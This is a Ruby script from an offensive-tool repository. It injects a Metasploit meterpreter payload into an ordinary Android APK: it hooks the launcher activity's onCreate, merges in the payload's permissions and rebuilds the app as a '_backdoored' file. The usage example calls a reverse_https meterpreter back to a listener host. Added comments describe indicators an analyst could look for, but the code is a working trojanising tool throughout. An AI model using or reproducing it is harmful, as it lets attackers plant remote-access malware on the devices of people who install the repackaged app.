GitHub Repository: screetsec/TheFatRat
Path: blob/master/tools/apkembed.rb
#!/usr/bin/env ruby
# aembed backdoor original script from timwr & Jack64
# recoded by Edo maland ( Scretsec ) to be compatible with thefatrat and fix errors :))
# This script is a POC for injecting metasploit payloads
# Arbitrary apk_backdoor
# Backdooring original apk files with metasploit
require 'nokogiri'
require 'fileutils'
require 'optparse'
# Find the activity that is opened when you click the app icon
# Find the launcher activity declared in a decoded AndroidManifest.xml.
#
# Scans every <activity> and <activity-alias> element and returns the name
# of the first one carrying a <category> whose android:name equals
# 'android.intent.category.LAUNCHER'. (The second comparison tests the same
# category attribute against an *action* string, so in practice only the
# LAUNCHER branch can match.) Package-relative names such as ".MainActivity"
# are prefixed with the manifest's package so the result maps onto a smali
# file path; a fully-qualified name under a *different* package would be
# prefixed too.
#
# @param amanifest [Nokogiri::XML::Document] parsed AndroidManifest.xml
# @return [String] fully-qualified activity class name on success.
#   NOTE(review): when nothing matches the method falls through and its
#   value is the result of the outer `for` expression (the activities
#   NodeSet), not nil -- callers expecting nil on failure will misbehave.
def findlauncheractivity(amanifest)
  package = amanifest.xpath("//manifest").first['package']
  activities = amanifest.xpath("//activity|//activity-alias")
  for activity in activities
    activityname = activity.attribute("name")
    category = activity.search('category')
    # `search` returns a NodeSet, which is truthy even when empty, so this
    # guard never fires; an activity without categories simply runs the
    # inner loop zero times.
    unless category
      next
    end
    for cat in category
      categoryname = cat.attribute('name')
      if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
        activityname = activityname.to_s
        # Expand a package-relative name (".Foo") to "<package>.Foo".
        unless activityname.start_with?(package)
          activityname = package + activityname
        end
        return activityname
      end
    end
  end
end
# If XML parsing of the manifest fails, recursively search
# the smali code for the onCreate() hook and let the user
# pick the injection point
# Interactive fallback used when the manifest-based lookup fails.
#
# Globs every .smali file under temp/original/smali*/ for the
# ";->onCreate(Landroid/os/Bundle;)V" signature, lists the hits on stdout
# and reads the chosen index from STDIN.
#
# Side effects: reads files under temp/original, prints to stdout, blocks
# on STDIN until a number in range is entered.
#
# @return [Array(String, String)] [path of the chosen smali file, its
#   contents]. Both strings are empty when the chosen index matched no
#   file.
def scrapeFilesForLauncherActivity()
  smali_files||=[]
  Dir.glob('temp/original/smali*/**/*.smali') do |file|
    checkFile=File.read(file)
    if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V")
      smali_files << file
      # These two assignments are block-local and are discarded when the
      # block exits; the method-level variables are set further down.
      smalifile = file
      activitysmali = checkFile
    end
  end
  i=0
  print "[*] Please choose from one of the following:\n"
  smali_files.each{|s_file|
    print "[+] Hook point ",i,": ",s_file,"\n"
    i+=1
  }
  hook=-1
  # After the listing loop `i` equals the number of hits, so the accepted
  # input range is 0..i inclusive; non-numeric input parses to 0 via to_i.
  while (hook < 0 || hook>i)
    print "\nHook: "
    hook = STDIN.gets.chomp.to_i
  end
  i=0
  smalifile=""
  activitysmali=""
  # Re-read the selected file; the empty defaults are returned unchanged
  # when `hook` matches no index.
  smali_files.each{|s_file|
    if (i==hook)
      checkFile=File.read(s_file)
      smalifile=s_file
      activitysmali = checkFile
      break
    end
    i+=1
  }
  return [smalifile,activitysmali]
end
# Merge the payload's <uses-permission> entries into the original app's
# manifest so the rebuilt APK requests every permission the payload needs.
#
# Reads temp/payload/AndroidManifest.xml and temp/original/AndroidManifest.xml,
# diffs their uses-permission names, prints each permission being added,
# and rewrites temp/original/AndroidManifest.xml in place with the missing
# entries inserted immediately before the first existing uses-permission
# line. Takes no arguments; the return value is that of the final File.open
# and is not used by callers on this page.
#
# From an analysis standpoint the rewritten manifest is a useful indicator:
# a repackaged app ends up requesting the union of its own and the payload's
# permissions, typically far broader than the original.
def fix_manifest()
  payload_permissions=[]

  #Load payload's permissions
  File.open("temp/payload/AndroidManifest.xml","r"){|file|
    k=File.read(file)
    payload_manifest=Nokogiri::XML(k)
    permissions = payload_manifest.xpath("//manifest/uses-permission")
    for permission in permissions
      name=permission.attribute("name")
      payload_permissions << name.to_s
    end
    # print "#{k}"
  }
  original_permissions=[]
  apk_mani=''

  #Load original apk's permissions
  File.open("temp/original/AndroidManifest.xml","r"){|file2|
    k=File.read(file2)
    # Raw text is kept for the line-based rewrite below.
    apk_mani=k
    original_manifest=Nokogiri::XML(k)
    permissions = original_manifest.xpath("//manifest/uses-permission")
    for permission in permissions
      name=permission.attribute("name")
      original_permissions << name.to_s
    end
    # print "#{k}"
  }
  #Get permissions that are not in original APK
  add_permissions=[]
  for permission in payload_permissions
    if !(original_permissions.include? permission)
      print "[*] Adding #{permission}\n"
      add_permissions << permission
    end
  end
  inject=0
  new_mani=""
  #Inject permissions in original APK's manifest
  # Text-level splice rather than a DOM write: the new entries go in front
  # of the first line mentioning "uses-permission", and `inject` ensures
  # that happens only once.
  for line in apk_mani.split("\n")
    if (line.include? "uses-permission" and inject==0)
      for permission in add_permissions
        new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
      end
      new_mani << line+"\n"
      inject=1
    else
      new_mani << line+"\n"
    end
  end
  File.open("temp/original/AndroidManifest.xml", "w") {|file| file.puts new_mani }
end
# --- Argument handling --------------------------------------------------
# The only positional argument consumed here is the target APK path; the
# usage text mentions msfvenom options, but nothing in this script reads
# them.
apkfile = ARGV[0]
unless(apkfile && File.readable?(apkfile))
  puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
  puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
  exit(1)
end

# --- Tool checks --------------------------------------------------------
# `which` prints an empty string when the binary is not on PATH.
jarsigner = `which jarsigner`
unless(jarsigner && jarsigner.length > 0)
  puts "No jarsigner"
  exit(1)
end

apktool = `which apktool`
unless(apktool && apktool.length > 0)
  puts "No apktool"
  exit(1)
end

# Running apktool with no arguments prints its banner; the second
# whitespace-separated token is assumed to be the version string.
apk_v=`apktool`
unless(apk_v.split()[1].include?("v2."))
  puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n"
  exit(1)
end

# --- Sign the payload ---------------------------------------------------
# The payload APK is signed with the Android debug key (alias
# androiddebugkey, store/key password "android") using SHA1 digests and
# MD5withRSA. For analysts, a debug-key signature on a published app is a
# common repackaging indicator.
print "[*] Signing payload..\n"
`jarsigner -verbose -keystore temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'temp/payload.apk' androiddebugkey`

# Start from clean work directories.
`rm -rf temp/original`
`rm -rf temp/payload`

`cp #{apkfile} temp/original.apk`

# --- Decode both APKs to smali -----------------------------------------
print "[*] Decompiling original APK..\n"
`apktool d temp/app.apk -o temp/original`
print "[*] Decompiling payload APK..\n"
`apktool d temp/payload.apk -o temp/payload`

f = File.open("temp/original/AndroidManifest.xml")
amanifest = Nokogiri::XML(f)
f.close

# --- Locate the hook point ---------------------------------------------
print "[*] Locating onCreate() hook..\n"

# Map the launcher activity's class name to its smali file; fall back to
# the interactive scan when that file does not exist.
launcheractivity = findlauncheractivity(amanifest)
smalifile = 'temp/original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali'
begin
  activitysmali = File.read(smalifile)
rescue Errno::ENOENT
  print "[!] Unable to find correct hook automatically\n"
  begin
    results=scrapeFilesForLauncherActivity()
    smalifile=results[0]
    activitysmali=results[1]
  rescue
    # Bare rescue catches StandardError raised by the interactive fallback.
    puts "[-] Error finding launcher activity. Exiting"
    exit(1)
  end
end

# --- Inject the payload -------------------------------------------------
# Copies the payload's Payload*.smali classes into the original app under
# com/metasploit/stage and inserts an invoke-static call to Payload.start
# right after the onCreate() signature of the launcher activity. Both the
# added class path and the extra invoke-static at the top of onCreate are
# static artifacts a reviewer can look for when triaging a suspected
# repackaged app.
print "[*] Copying payload files..\n"
FileUtils.mkdir_p('temp/original/smali/com/metasploit/stage/')
FileUtils.cp Dir.glob('temp/payload/smali/com/metasploit/stage/Payload*.smali'), 'temp/original/smali/com/metasploit/stage/'
activitycreate = ';->onCreate(Landroid/os/Bundle;)V'
payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
print "[*] Loading ",smalifile," and injecting payload..\n"
File.open(smalifile, "w") {|file| file.puts hookedsmali }
# Output name: everything before the first "." of the input path plus
# "_backdoored.apk".
injected_apk=apkfile.split(".")[0]
injected_apk+="_backdoored.apk"

print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest()

print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
`apktool b -o #{injected_apk} temp/original`

puts "[+] Infected file #{injected_apk} ready.\n"